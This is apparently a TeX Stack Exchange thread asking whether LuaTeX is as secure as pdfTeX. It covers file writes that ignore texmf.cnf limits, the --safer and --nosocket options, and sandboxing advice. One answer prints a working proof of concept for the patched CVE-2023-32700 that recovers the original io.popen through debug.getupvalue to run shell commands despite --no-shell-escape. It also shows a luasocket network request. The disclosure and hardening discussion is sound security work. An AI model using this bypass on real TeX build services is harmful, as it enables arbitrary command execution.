# Is luatex as secure as pdftex?

Tags: luatex, security

My `texmf.cnf` file contains these lines:

```
% Allow TeX \openin, \openout, or \input on filenames starting with `.'
% (e.g., .rhosts) or outside the current tree (e.g., /etc/passwd)?
% a (any)        : any file can be opened.
% r (restricted) : disallow opening "dotfiles".
% p (paranoid)   : as `r' and disallow going to parent directories, and
%                  restrict absolute paths to be under $TEXMFOUTPUT.
openout_any = p
openin_any = a
```

But if I compile the following code via `lualatex`, the file `/home/login/unsafe.txt` is created!

```
\documentclass{article}
\usepackage{luatextra}
\begin{luacode*}
  function securityproblem(a)
    local file = assert(io.open(os.getenv("HOME") .. "/unsafe.txt", "w"))
    file:write("foobar\n")
    file:write(a)
    file:close()
  end
\end{luacode*}
\begin{document}
\directlua{securityproblem("\today")}
\end{document}
```

*Is luatex as secure as pdftex?*

**Edit:**

With the `--safer` option, `luatex` can't write files (via `io.open`) but `fontspec` (for example) is unusable.

*Is there a safe way to use LuaTEX with `fontspec` (and other useful features of LuaTeX) ?*

**Edit (May 2023)**

The security of Lua(La)TeX seems to be taken into account in certain aspects: [LuaTeX Security Vulnerabilities](https://tug.org/%7Emseven/luatex.html)

*Ten years after, does my question have an acceptable answer?*

Comment: Have you tried with `lualatex --safer --no-shell-escape`? The manual hints that otherwise functions such as `io.open` can be used as in normal lua.

Answer (score 17):

You have to be careful with the `--safer` option.  `lualatex --safer file.tex` correctly disables many things. But `lualatex file.tex --safer` doesn't disable your example or `os.remove()` or give warnings about an incorrectly located option (at least with TeX Live 2012 under Windows).

According to the [LuaTeX manual](http://www.luatex.org/svn/trunk/manual/luatexref-t.pdf), `--safer` disables the following:

- **os**

  - execute, exec, setenv, rename, remove, tmpdir
- **io**

  - popen, output, tmpfile
- **lfs**

  - rmdir, mkdir, chdir, lock, touch

> Furthermore, it disables loading of compiled LUA libraries (support for these was added in 0.46.0), and it
> makes `io.open()` fail on ﬁles that are opened for anything besides reading.

After a quick look through the documentation on these three libraries, I don't see much else obvious that could cause mischief.  `lfs.link()` might be used to create a symlink and possibly cause issues under some circumstances.

You might also want the `--nosocket`/`--no-socket` option.

> `--nosocket` makes the socket library unavailable, so that LUA cannot use networking.

Answer (score 4):

> **Edit (May 2023)**
>
> The security of Lua(La)TeX seems to be taken into account in certain
> aspects: [LuaTeX Security
> Vulnerabilities](https://tug.org/%7Emseven/luatex.html)
>
> *Ten years after, does my question have an acceptable answer?*

I'm the one who wrote that linked article, so let's take a closer look at some of the issues there.

#### CVE-2023-32700 (the “`popen`” vulnerability)

This is the main issue discussed in that link. We'll start with a quote from [the LuaTeX manual](https://texdoc.org/serve/luatex/0) §4.1.3:

> The switches `--[no-]shell-escape`, `--[enable|disable]-write18`, and `--shell-restricted` have the same effects as in pdfTeX, and additionally make `io.popen()`, `os.execute`, `os.exec` and `os.spawn` adhere to the requested option.

And for some further context, §5.5 of [the `web2c` manual](https://texdoc.org/serve/web2c/0):

> TeX can execute shell escapes, that is, arbitrary shell commands. Although tremendously useful, this also has obvious security implications. Therefore, as of TeX Live 2009, a restricted mode for shell escapes is the default mode of operation, which allows executing only certain commands, as specified in the `texmf.cnf` configuration file.
>
> - Unrestricted shell escapes are allowed if the option `--shell-escape` is specified, or if the environment variable or config file value `shell_escape` is set to ‘t’ or ‘y’ and ‘1’.
> - Restricted shell escapes are allowed if `shell_escape` is set to ‘p’. This is the default.
> - Shell escapes are completely disabled if `--no-shell-escape` is specified, or if `shell_escape` is set to anything else.
>
> [...]
>
> The purpose of this feature is to make it possible for TeX documents to perform useful external actions in the common case of an individual user running a known document on his or her own machine. In such environments as CGI scripts or wikis where the input has to be considered untrustworthy, shell escapes should be completely disabled.

And finally, an excerpt from `luatex --help`:

> ```
>    --[no-]shell-escape           disable/enable system commands
>    --shell-restricted            restrict system commands to a list of commands given in texmf.cnf
> ```

##### What should we expect

Based off of the quoted snippets in these manuals, you would expect that compiling a document with something like

```sh
$ luatex --no-shell-escape some-document.tex
```

means that this document cannot execute any shell command at all.

So let's test it:

```sh
$ luatex --no-shell-escape '\directlua{print(io.popen("python3 --version"))}\end'
This is LuaTeX, Version 1.17.0 (TeX Live 2023) 
nil     all command execution is disabled

$ luatex --shell-restricted '\directlua{print(io.popen("python3 --version"))}\end'
This is LuaTeX, Version 1.17.0 (TeX Live 2023) 
 restricted system commands enabled.
nil     specific command execution disabled

$ luatex --shell-escape '\directlua{print(io.popen("python3 --version"):read("a"))}\end'
This is LuaTeX, Version 1.17.0 (TeX Live 2023) 
 system commands enabled.
Python 3.11.3
```

This worked exactly as we would expect: only with “unrestricted” shell escape can we run arbitrary commands.

##### The vulnerability

But if you're particularly clever, you can work around this:

```tex
% shell-escape-test.tex
\directlua{
    local function get_upvalue(func, name)
        local nups = debug.getinfo(func).nups

        for i = 1, nups do
            local current, value = debug.getupvalue(func, i)
            if current == name then
                return value
            end
        end
    end

    local outer = get_upvalue(io.popen, "popen")
    local popen = get_upvalue(outer or io.popen, "io_popen")

    print(popen(arg[rawlen(arg)]):read("*a"))
}
\csname@@end\endcsname
\end
```

```sh
$ luatex --no-shell-escape shell-escape-test.tex "python3 --version"
This is LuaTeX, Version 1.16.0 (TeX Live 2023)
 restricted system commands enabled.
(./shell-escape-test.texPython 3.11.3
)
warning  (pdf backend): no pages of output.
Transcript written on shell-escape-test.log.
```

So despite what all the documentation said, we *can* still use shell escape. But what exactly is happening here?

From [the link above](https://tug.org/%7Emseven/luatex.html#the-exploit):

> When LuaTeX is started — before it runs any TeX or Lua code — it first
> calls the C function `load_luatex_core_lua`. This function runs the
> file `luatex-core.lua` that is embedded into the LuaTeX binary. Among
> other things, this file modifies a few Lua modules, mostly for
> backwards compatibility and security purposes.
>
> Here’s an excerpt of the relevant code:
>
> ```lua
> local io_popen = io.popen
> -- [...]
> local function luatex_io_popen(name,...)
>     local okay, found = kpse_checkpermission(name)
>     if okay and found then
>         return io_popen(found,...)
>     end
> end
> -- [...]
> io.popen = luatex_io_popen
> ```
>
> The above is pretty straightforward: it saves a local copy of the
> original `io.popen`, defines a new wrapper function that checks to see
> if the command is allowed with the current shell escape setting, and
> sets `io.popen` to the wrapper function.
>
> The problem here is the local copy. The wrapper function saves a
> reference to the original `io.popen`, and using the Lua standard
> library function `debug.getupvalue`, we can access this internal
> reference. Once we’ve extracted the internal `io.popen`, we can use it
> to execute arbitrary processes without restriction, completely
> defeating any of the shell escape protections.

#### CVE-2023-32668 (the “`luasocket`” vulnerability

Now let's look at the other “vulnerability” in that link. Same as last time, we'll start by quoting the documentation.

From the LuaTeX manual §4.3:

> `luasocket`, by Diego Nehab [http://w3.impa.br/~diego/software/luasocket/](http://w3.impa.br/%7Ediego/software/luasocket/). The `.lua` support modules from `luasocket` are also preloaded inside the executable, there are no external file dependencies.

So, the manual states that `luasocket` support is included with LuaTeX. As the name suggests, this module lets you make network requests from within LuaTeX.

And the output of `luatex --help | grep socket`:

> ```
>    --nosocket                    disable the lua socket library
> ```

This doesn't directly state it, but the presence of `--nosocket` pretty heavily implies that sockets (network access) is enabled by default.

So, all this vulnerability means is that you can make network requests from within a TeX document:

```tex
\documentclass{article}

\usepackage{luacode}
\begin{luacode*}
    local http = require "socket.http"
    function get_ip()
        body, code, headers = http.request("http://icanhazip.com")
        tex.sprint(body)
    end
\end{luacode*}
\def\getip{\directlua{get_ip()}}

\begin{document}
    Your IP address is \getip.
\end{document}
```

But the documentation has always (for over 10 years now) stated that LuaTeX includes and enables `luasocket`, so this shouldn't be terribly surprising. This behaviour may be unwanted and potentially dangerous, but I wouldn't quite call it a “vulnerability”.

#### The original question

So, how does this relate to the original question? Let's look at §4.1.3 of the LuaTeX manual again:

> At the moment, `--safer` [...] makes `io.open()` fail on files that are opened for anything besides reading.

The manual never says anything directly, but this pretty heavily implies that without `--safer`, `io.open()` *can* open files for writing.

I'm sure that you've already reran the code in your question, so you've probably figured out that it still works. This is quite similar to the `luasocket` issue though: both features could be potentially dangerous, but to be fair, LuaTeX never claimed to restrict either feature.

#### Compared to pdfTeX

Also, keep in mind that pdfTeX has had similar vulnerabilities in the past: [CVE-2016-10243](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) affected pdfTeX, and allowed a particularly clever user to run arbitrary shell commands, even with only “restricted” shell escape enabled—just like the recently-patched “`popen`” vulnerability. In addition, pdfTeX embeds `xpdf`, [which has had quite a few security issues](https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=xpdf).

Regardless, I'd say that—in general—LuaTeX is less secure than pdfTeX, simply because it gives you so many more ways to interact with the host system. There are certainly some things that could be tightened up, but there's a limit to how much you can do—one of the major reasons to use LuaTeX is *because* of the better access to the underlying system.

Also, computing has advanced a lot between the release of pdfTeX (in 1996) and now. Back then, containers and virtual machines didn't exist (on `x86` at least), so the only way to safely run untrusted documents was to secure the underlying program.

These days, it's quick and easy to spin up an isolated container to compile any untrusted documents:

```sh
$ docker run --rm -it -v "$(pwd):/root" registry.gitlab.com/islandoftex/images/texlive:latest-medium lualatex /root/untrusted.tex
```

Or, if you're on Linux, you can just sandbox your LuaTeX compiler:

```sh
$ systemd-run --user \
       -p PrivateUsers=true \
       -p TemporaryFileSystem=/:ro \
       -p PrivateDevices=true \
       -p PrivateTmp=true \
       -p BindPaths="$(pwd)" \
       -p BindReadOnlyPaths='/bin/ /etc/ /lib/ /lib64/ /usr/' \
       --working-directory="$(pwd)" \
       --wait --collect --pipe \
       lualatex untrusted.tex
```

Either of these are *more* secure than just running pdfTeX on your host computer since these sandboxes ensure that even a completely malicious LuaTeX binary would have very limited access to your host system.

Answer (score 3):

## Setup

- Operating System: Arch Linux (Manjaro)
- TeXLive: texlive-bin 2022.62885-3
- Terminal: Xfce/bash

Technically, texlive-bin 2022.62885-3 is not the newest release at the time of writing (May 2023); but newer than the one that was available when the question was originally asked 10 years ago and according to [Tug Post](https://tug.org/%7Emseven/luatex.html) provided by the author of the question the version BEFORE the vulnerability fix was included.

## Observations

### Update 1 (2023-05-25):

Included output of `kpsewhere texmf.cnf`, thanks @Paul Gaborit for pointing out that command.

### 1. Compilation with `lualatex FILENAME.tex`,
 no modifications to `texmf.cnf`

creates the file at `/home/$USER/unsafe.txt`

Output of `kpsewhere texmf.cnf`: `/usr/share/texmf-dist/web2c/texmf.cnf`

### 2. Compilation with `lualatex --safer FILENAME.tex` ,
 no modifications to `texmf.cnf`

does not work, since the `--safer` flag gets detected and throws an error message:
`luaotfload can't run with option --safer. Aborting`
`/usr/share/texmf-dist/tex/luatex/luaotfload/luaotfload.lua:105: safer_option  used`

Output of `kpsewhere texmf.cnf`: `/usr/share/texmf-dist/web2c/texmf.cnf`

### 3. Compilation with `lualatex FILENAME.tex`,
 additional local `texmf.cnf`, `TEXMFCNF` Option 1

I created a **LOCAL** `texmf.cnf` only containing:

```
openout_any = p
openin_any = a
```

Before compilation, I added the line `export TEXMFCNF='PATH/TO/LOCAL/TEXMF/DIR/'` into my `~/.bashrc`.
Like expected, the compilation fails due to `I can't find the format file 'lualatex.fmt'!` (and consequently does not produce `/home/$USER/unsafe.txt`), since the local `texmf.cnf` is technically incomplete and the missing information prevents lualatex to run in the first place.

Output of `kpsewhere texmf.cnf`:   (None)

### 4. Compilation with `lualatex FILENAME.tex`,
 additional local `texmf.cnf`, `TEXMFCNF` Option 2

I created a **LOCAL** `texmf.cnf` only containing:

```
openout_any = p
openin_any = a
```

Before compilation, I added the line `export TEXMFCNF='PATH/TO/LOCAL/TEXMF/DIR/:'` into my `~/.bashrc` and compiled the MWE with `lualatex FILENAME.tex`. Now the compilation runs with no error, but also produces `/home/$USER/unsafe.txt`

Output of `kpsewhere texmf.cnf`: `PATH/TO/LOCAL/TEXMF/DIR/texmf.cnf`

#### Explanation:

1. The `:` at the end of the `TEXMFCNF` string allows Kpathsea to load all `texmf.cnf` it can find (including the default one). Omitting the `:` forces `kpathsea` to only use the path that is specified in `TEXMFCNF`.
2. Although the output of `kpsewhere` points towards `PATH/TO/LOCAL/TEXMF/DIR/texmf.cnf`, another `texmf.cnf` has to be loaded (since the local file is incomplete and should not allow a compilation).

### 5. Compilation with `lualatex FILENAME.tex`,
 only local `texmf.cnf`, `TEXMFCNF` Option 1

I copied `/usr/share/texmf-dist/web2c/texmf.cnf` to a **LOCAL** `texmf.cnf` and added at the end:

```
openout_any = p
openin_any = a
```

Before compilation, I added the line `export TEXMFCNF='PATH/TO/LOCAL/TEXMF/DIR/'` into my `~/.bashrc` and compiled the MWE with `lualatex FILENAME.tex`.
The compilation creates the file at `/home/$USER/unsafe.txt`

Output of `kpsewhere texmf.cnf`: `PATH/TO/LOCAL/TEXMF/DIR/texmf.cnf`

**Explanation:** In the file `/usr/share/texmf-dist/web2c/texmf.cnf` the values for `openout_any` and `openin_any` are already set to the desired values.

## Summary of Observations

Either the document does not compile at all or the undesired file `/home/$USER/unsafe.txt` will be created.

## Possible Reason

### Update 1 (2023-05-25):

According to the comment of @Paul Gaborit,

> the `TeX` part of `luatex` respects the settings related to `kpathsea`, but the `Lua` part of `luatex` ignores these settings.

This means that there is no way to control the behavior of `Lua` with a local `texmf.cnf`. In addition, `Lua` seems to also ignore the

```
openout_any = p
openin_any = a
```

which are already set in the default `texmf.cnf`.

## Is there a safe way to use LuaTEX with fontspec (and other useful features of LuaTeX)?

Consider the following MWE:

```latex
\documentclass{scrreprt}
\usepackage{fontspec}

\begin{document}
    Test Document to see, whether {\ttfamily fontspec} 
    works with the {\ttfamily --safe} or other options
\end{document}
```

Compilation with `lualatex FILENAME.tex` produces a valid pdf. 
Compilation with `lualatex --safe FILENAME.tex` aborts and gives the following error message:

```
(/usr/share/texmf-dist/tex/latex/base/fontenc.sty
! Font \TU/lmr/m/n/10.95=[lmroman10-regular]:+tlig; at 10.95pt not loadable: me
tric data not found or bad.
<to be read again> 
relax 
l.112 ...lt\familydefault\seriesdefault\shapedefault
```

So still, as of May 2023, the `--safe` option cannot be used in conjunction with `fontspec`. Using `\usepackage{fontspec-luatex}` does change nothing.
The [LuaTeX Reference Manual](https://www.pragma-ade.com/general/manuals/luatex.pdf) provides additional, less restrictive command line options. They should in theory not block the file i/o, but e.g. networking capabilities. The command line options are:

- `--nosocket` (prevents networking capabilities)
- `--no-shell-escape` (prevents `shell-escape` completely)
- `--shell-restricted` (restricts `shell-escape` to behavior defined in `texmf.cmf`)

The MWE compiles with `lualatex --nosocket --no-shell-escape FILENAME.tex` as well as `lualatex --nosocket --shell-restricted FILENAME.tex`

This of course does not offer as much protection as `--safer`, but should be better than none. So unfortunately, as by May 2023, there is no easy way to make `LuaLaTeX` safe and use all its functionality.

## Conclusion: Is `luatex` as secure as `pdftex`?

Well, that depends. In my opinion, there are two aspects to consider:

1. As soon as `shell-escape` is allowed, both `luatex` and `pdftex` are technically unsafe. In this case, malicious actors could inject code however they please, completely independent of what the internal capabilities of `luatex` and `pdftex` actually are.
2. But what if `shell-escape` is explicitly prohibited? This is a tricky one to answer definitively.
    One might argue that even without the `shell-escape` options, since the `Lua` programming language is very powerful and comparatively wider spread than `LaTeX`, a potential malicious actor would have a big knowledge base to profit from and more attack options at their disposal. However, `LaTeX3` is also insanely powerful and - in theory - could provide similar file i/o vulnerability as `Lua`. What reduces this risk is that the `LaTeX3` syntax is quite cumbersome and not widely used outside the hardcore LaTeX community. Consequently, as the knowledge base is smaller and less as well as less worthwhile targets are available, the attack risk could be assumed to be a lot smaller.

In my humble opinion, there is no clear another possible as long as somebody tries to find `LaTeX3` exploits and to replicate the `LuaLaTeX` exploits outlined in the [Tug Post](https://tug.org/%7Emseven/luatex.html).
Additionally, in my experience, the `Lua` subset one can use in `LuaLaTeX` out-of-the-box is/behaves quite different/ly as the regular `Lua`. So porting of (higher-level/complicated) malware is not always straightforward.

My advice would be to at first use `pdftex` (if it provides you with all functionality you need) and only switch to `LuaLaTeX` if required. That also makes it easier to share your LaTeX files with other, less technically inclined LaTeX users, as in my experience sometimes the `LuaLaTeX` compilation is more tricky and the available functionality differs between different releases (versions as well as `MikTeX` versus `TeXLive`).

Comment: That's nothing like an up-to-date TeX Live release!

Comment: The `kpsewhere texmf.cnf` command displays the first `texmf.cnf` used (the one that takes precedence over all others).

Comment: The correct answer to your _"Possible Reasons"_ question is: the TeX part of `luatex` respects the settings related to `kpathsea` but the Lua part of `luatex` ignores these settings.